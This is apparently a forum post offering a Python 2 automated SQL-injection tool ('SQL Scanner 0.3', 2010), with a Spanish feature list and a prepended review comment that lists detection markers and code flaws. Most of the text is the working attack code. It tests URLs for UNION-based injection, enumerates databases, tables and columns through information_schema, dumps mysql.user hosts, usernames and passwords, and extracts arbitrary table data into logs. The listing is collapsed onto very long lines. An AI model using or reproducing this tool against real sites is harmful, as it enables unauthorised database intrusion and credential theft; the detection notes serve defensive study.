Con las siguientes opciones:
- Verifica vulnerabilidad
- Busca columnas
- Busca el número milagroso y saca info sobre la DB
- Saca tablas y columnas de la DB actual o de otra externa
- Dumpear usuarios
- Guarda todo en un log con el nombre de la web en la carpeta /logs
Código
# ---------------------------------------------------------------------------
# Review notes (the code below is kept byte-for-byte as extracted):
#
# * Python 2 source: print statements, urllib2, urlparse, raw_input() and
#   input().  The listing was collapsed onto a handful of very long lines when
#   the page was extracted, so the original line breaks and indentation are
#   gone and it is not parseable as pasted.
#
# * What it is: an interactive MySQL UNION-based SQL-injection tool
#   ("SQL Scanner 0.3", 2010).  sta() prompts for a page URL and a comment
#   style; scan() sends one probe request and looks for the MySQL error text
#   "The used SELECT statements have a different number of columns";
#   findlength() then probes 2..29 columns, and the menu options query
#   information_schema.{tables,columns,schemata}, mysql.user and caller-named
#   table columns, pulling values out of the response between marker strings.
#
# * Detection artifacts visible in the code (useful for WAF / access-log rules):
#   - marker constants 0x4b30425241 ("K0BRA"), 0x4B3042524131 ("K0BRA1"),
#     0x4B3042524132 ("K0BRA2") and 0x334d50335a3452 ("3MP3Z4R"), always
#     wrapped in unhex(hex(concat(...)));
#   - query tokens separated by "+" or "/**/" (bypass()), terminated by
#     "--" or "/*";
#   - a fixed User-Agent "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
#     rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5" on every request (toma()).
#
# * Code-review findings (documented here, code not changed):
#   - menu() reads the option with Python 2 input(), which evaluates the
#     typed text as an expression; the enclosing bare `except:` restarts the
#     menu on any error, hiding the cause.
#   - menu() and sta() re-enter themselves instead of looping, so recursion
#     depth grows with every action.
#   - option 9 runs os.system("start logs/<host>.txt") where <host> is the
#     netloc of the user-supplied URL, i.e. that string reaches a shell.
#   - savefile() appends to "logs/<host>.txt" relative to the working
#     directory with open(name, "a"); nothing creates the logs/ directory.
# ---------------------------------------------------------------------------
#!usr/bin/python #SQL Scanner 0.3 (C) Doddy Hackman 2010 import os,sys,urllib2,re,binascii from urlparse import urlparse def clean(): if sys.platform=="win32": os.system("cls") else: os.system("clear") def savefile(name,text): file = open(name,"a") file.write("\n"+text+"\n") file.close() def gethost(test): return urlparse(test).netloc def header() : print "\n--== SQL Scanner ==--\n" def copyright() : print "\n\n(C) Doddy Hackman 2010\n" sys.exit(1) def show() : print "\n[*] Sintax : ",sys.argv[0]," <web>\n" def toma(web) : nave = urllib2.Request(web) nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5'); op = urllib2.build_opener() return op.open(nave).read() def bypass(bypass): if bypass == "--": return("+","--") elif bypass == "/*": return("/**/","/*") else: return("+","--") def dumper(web,passx,table,col1,col2): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,0x4B3042524131,"+col2+",0x4B3042524131)))",web) code1 = toma(web1+pass1+"from"+pass1+table+pass2) print "\n\n[+] Searching values\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] Values Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): c1 = re.findall("K0BRA(.*?)K0BRA",code2) c1 = c1[0] c2 = re.findall("K0BRA1(.*?)K0BRA1",code2) c2 = c2[0] print "["+col1+"] : "+c1 print "["+col2+"] : "+c2+"\n" savefile("logs/"+gethost(web)+".txt","["+col1+"] : "+c1) savefile("logs/"+gethost(web)+".txt","["+col2+"] : "+c2+"\n") else: print "[-] Not Found\n" def mysqluser(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = 
re.sub("hackman","unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))",web) code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) print "\n\n[+] Searching mysql.user\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] mysql.user : ON" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : ON") savefile("logs/"+gethost(web)+".txt","[+] Users Found : "+numbers+"\n") print "[+] Users Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): host = re.findall("K0BRA(.*?)K0BRA",code2) host = host[0] user = re.findall("K0BRA1(.*?)K0BRA1",code2) user = user[0] passw = re.findall("K0BRA2(.*?)K0BRA2",code2) passw = passw[0] savefile("logs/"+gethost(web)+".txt","[Host] : "+host) savefile("logs/"+gethost(web)+".txt","[User] : "+user) savefile("logs/"+gethost(web)+".txt","[Pass] : "+passw+"\n") print "[Host] : "+host print "[User] : "+user print "[Pass] : "+passw+"\n" else: print "[-] Not Found\n" def showcolumnsdb(web,db,table,passx): db = "0x"+str(binascii.hexlify(db)) table = "0x"+str(binascii.hexlify(table)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching columns in DB\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] savefile("logs/"+gethost(web)+".txt","[DB] : "+db) savefile("logs/"+gethost(web)+".txt","[DB] : "+table) print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for 
counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+table+pass1+"and"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) print "[Column Found] : "+column else: print "[-] Not Found\n" def showtablesdb(web,db,passx): db = "0x"+str(binascii.hexlify(db)) pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass2) print "\n\n[+] Searching tables in DB\n\n" savefile("logs/"+gethost(web)+".txt","[DB] : "+db) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+db+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showtables(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) print "\n\n[+] Searching tables\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] 
information_schema : ON" print "[+] Tables Found : ",numbers,"\n" for counter in range(17,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): table = re.findall("K0BRA(.*?)K0BRA",code2) table = table[0] print "[Table Found] : "+table savefile("logs/"+gethost(web)+".txt","[Table Found] : "+table) else: print "[-] Not Found\n" def showcolumns(tabla,web,passx): pass1,pass2 = bypass(passx) tabla = "0x"+str(binascii.hexlify(tabla)) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass2) print "\n\n[+] Searching tables\n\n" savefile("logs/"+gethost(web)+".txt","[Table Found] : "+tabla) if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] print "[+] information_schema : ON" print "[+] Columns Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabla+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): column = re.findall("K0BRA(.*?)K0BRA",code2) column = column[0] print "[Column Found] : "+column savefile("logs/"+gethost(web)+".txt","[Column Found] : "+column) else: print "[-] Not Found\n" def showdbs(web,passx): pass1,pass2 = bypass(passx) web1 = re.sub("hackman","unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))",web) web2 = re.sub("hackman","unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))",web) code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2) print "\n\n[+] Searching DBS\n\n" if (re.findall("K0BRA(.*?)K0BRA",code1)): numbers = re.findall("K0BRA(.*?)K0BRA",code1) numbers = numbers[0] 
print "[+] information_schema : ON" print "[+] DBS Found : ",numbers,"\n" for counter in range(0,int(numbers)): code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+repr(counter)+",1"+pass2) if (re.findall("K0BRA(.*?)K0BRA",code2)): db = re.findall("K0BRA(.*?)K0BRA",code2) db = db[0] print "[DB Found] : "+db savefile("logs/"+gethost(web)+".txt","[DB Found] : "+db) else: print "[-] Not Found\n" def menu(page,bypass): clean() header() print "\n[+] Target : ",page,"\n" print "\n[information_schema]\n\n" print "1 - Show tables\n" print "2 - Show columns of the a table\n" print "3 - Show databases\n" print "4 - Show tables from the a DB\n" print "5 - Show columns from the a table of the DB\n" print "\n[mysql.user]\n\n" print "6 - Show users\n" print "\n[Others]\n\n" print "7 - Show details\n" print "8 - Dump data\n" print "9 - Show log\n" print "10 - Change target\n" print "11 - Exit\n\n" try: op = input("[Option] : ") if op == 1: showtables(page,bypass) raw_input() menu(page,bypass) elif op == 2: table = raw_input("\n\n[Table] : ") showcolumns(table,page,bypass) raw_input() menu(page,bypass) elif op == 3: showdbs(page,bypass) raw_input() menu(page,bypass) elif op == 4: db = raw_input("\n\n[DB] : ") showtablesdb(page,db,bypass) raw_input() menu(page,bypass) elif op == 5: db = raw_input("\n\n[DB] : ") table = raw_input("\n\n[Table] : ") showcolumnsdb(page,db,table,bypass) raw_input() menu(page,bypass) elif op == 6: mysqluser(page,bypass) raw_input() menu(page,bypass) elif op == 7: more(page,bypass) raw_input() menu(page,bypass) elif op == 8: table = raw_input("\n\n[Table] : ") col1 = raw_input("\n\n[Column 1] : ") col2 = raw_input("\n\n[Column 2] : ") dumper(page,bypass,table,col1,col2) raw_input() menu(page,bypass) elif op == 9: os.system("start logs/"+gethost(page)+".txt") menu(page,bypass) elif op == 10: sta() except: menu(page,bypass) if op == 11: copyright() def more(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Searching 
more data\n" web1 = re.sub("hackman","unhex(hex(concat(0x334d50335a3452,0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241,0x334d50335a3452)))",web) code0 = toma(web1+pass2) if (re.findall("3MP3Z4R(.*?)3MP3Z4R",code0)): datax = re.findall("3MP3Z4R(.*?)3MP3Z4R",code0) datar = re.split("K0BRA",datax[0]) print "[+] Username :",datar[1] print "[+] Database :",datar[2] print "[+] Version :",datar[3],"\n" savefile("logs/"+gethost(web)+".txt","[+] Username : "+datar[1]) savefile("logs/"+gethost(web)+".txt","[+] Database : "+datar[2]) savefile("logs/"+gethost(web)+".txt","[+] Version : "+datar[3]+"\n") code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2) if (re.findall("K0BRA",code1)): print "[+] mysql.user : on" savefile("logs/"+gethost(web)+".txt","[+] mysql.user : on") code2 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2) if (re.findall("K0BRA",code2)): print "[+] information_schema.tables : on" savefile("logs/"+gethost(web)+".txt","[+] information_schema.tables : on") def findlength(web,passx): pass1,pass2 = bypass(passx) print "\n[+] Finding columns length" number = "unhex(hex(concat(0x4b30425241,1,0x4b30425241)))" for te in range(2,30): number = str(number)+","+"unhex(hex(concat(0x4b30425241,"+str(te)+",0x4b30425241)))" code = toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+number+pass2) if (re.findall("K0BRA(.*?)K0BRA",code)): numbers = re.findall("K0BRA(.*?)K0BRA",code) print "[+] Column length :",te print "[+] Numbers",numbers,"print data" sql = "" tex = te + 1 for sqlix in range(2,tex): sql = str(sql)+","+str(sqlix) sqli = str(1)+sql sqla = re.sub(numbers[0],"hackman",sqli) savefile("logs/"+gethost(web)+".txt","[Target] : "+web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla) menu(web+"-1"+pass1+"union"+pass1+"select"+pass1+sqla,passx) print "[-] Length dont found\n" def scan(web,passx): pass1,pass2 = bypass(passx) print "\n\n[+] Testing vulnerability" code = 
toma(web+"-1"+pass1+"union"+pass1+"select"+pass1+"1"+pass2) if (re.findall("The used SELECT statements have a different number of columns",code,re.I)): print "[+] SQLI Detected" findlength(web,passx) else: print "[-] Not Vulnerable" copyright() def sta(): clean() header() web = raw_input("\n\n[Page] : ") bypasx = raw_input("\n\n[Bypass] : ") scan(web,bypasx) sta() #The End